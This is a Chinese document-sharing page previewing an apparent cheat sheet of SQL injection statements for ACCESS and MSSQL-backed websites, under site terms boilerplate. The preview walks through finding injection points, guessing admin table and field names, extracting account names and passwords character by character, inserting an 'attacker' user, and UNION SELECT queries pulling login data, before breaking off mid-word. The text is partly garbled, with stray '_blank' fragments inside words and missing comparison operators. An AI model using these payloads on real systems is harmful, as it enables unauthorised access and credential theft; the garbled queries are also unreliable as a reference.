【精选】标准SQL注入语句.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
【精选】标准SQL注入语句

标准SQL注入语句(ACCESS数据库) 第一,判断有无注入点 ‘; and 1=1 and 1=2 第二,猜表: 常见的表有:admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) —判断是否存在admin这张表 第三,.猜帐号数目 如果遇到0 返回正确页面1返回错误页面说明帐号数目就是1个 and 0(select count(*) from admin) and 1(select count(*) from admin) 第四,.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*) 0)– and 1=(select count(*) from admin where len(用户字段名称name)0) and 1=(select count(*) from admin where len(_blank密码字段名称password)0) 第五,猜解各个字段的长度 猜解长度就是把0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)0) and 1=(select count(*) from admin where len(name)6) 错误 and 1=(select count(*) from admin where len(name)5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)11) 正确 and 1=(select count(*) from admin where len(password)12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 第六猜解字符 and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位 and 1= (select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51) – 这个查询语句可以猜解中文的用户和_blank密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. group by users.id having 1=1– group by users.id, users.username, users.password, users.privs having 1= 1– ; insert into users values( 666, attacker, foobar, 0xffff )– UNION Select TOP 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank _NAME=logintable- UNION Select TOP 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank_NAME=logintable Where COLUMN_blank_NAME NOT IN (login_blank_id)- UNION Select TOP 1 COLUMN_blank_NAME FROM INFORMATION_blank_SCHEMA.COLUMNS Where TABLE_blank_NAME=logintable Where COLUMN_blank_NAME NOT IN (login_blank_id,login_blank_name)- UNION Select TOP 1 login_blank _name FROM logintable- UNION Select TOP 1 password FROM logintable where login_blank_na

文档评论(0)

tazhiq2 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档